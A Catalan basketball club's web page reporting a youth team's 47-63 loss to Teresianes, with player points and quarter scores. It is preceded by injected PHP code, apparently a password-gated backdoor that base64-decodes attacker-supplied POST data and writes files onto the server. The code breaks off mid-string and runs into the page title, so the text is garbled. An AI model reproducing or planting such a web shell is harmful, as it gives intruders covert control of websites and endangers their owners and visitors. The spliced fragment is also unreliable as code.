function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El mal inici de l'infantil masculí B el condemna contra Teresianes (47-63) - Tgn Bàsquet Club -

El mal inici de l’infantil masculí B el condemna contra Teresianes (47-63)

Updated: març 17, 2014

L’infantil masculí B del TGN Bàsquet va perdre amb claredat contra Teresianes en un partit que va estar marcat pel desencert local en els primers vint minuts. Així, la fluixa defensa i  la manca de concentració en les dues cistelles van permetre els visitants arribar al descans amb la màxima diferència al seu favor (21-42). En la segona meitat, els locals van millorar molt la seva defensa però no van estar encertats en atac i no van poder impedir la derrota.

TGN BASQUET B 47 – AMPA TERESIANES 63

TGN BASQUET B: Casino (16), Blasi (12) Mateu, Puyuelo (6) i Rubio (10) – cinco inicial – Torija (7), Escalera (2) i Blade. 6 de 23 en tirs lliures, 15 faltes.

AMPA TERESIANAS: Martos (15), Delgado (15), Castillo (4), Badia (6) i Blesa (3) – cinc inicial – Fernández (9), Venteo (9)  i Cascasas. 7 de 19 en tirs lliures, 14 faltes.

Parcials: 8 – 12, 3 – 14, 8 – 7, 2 – 9, 8 – 4, 6 – 6, 6 – 7, 6 – 4.
Àrbitre: Linares, J.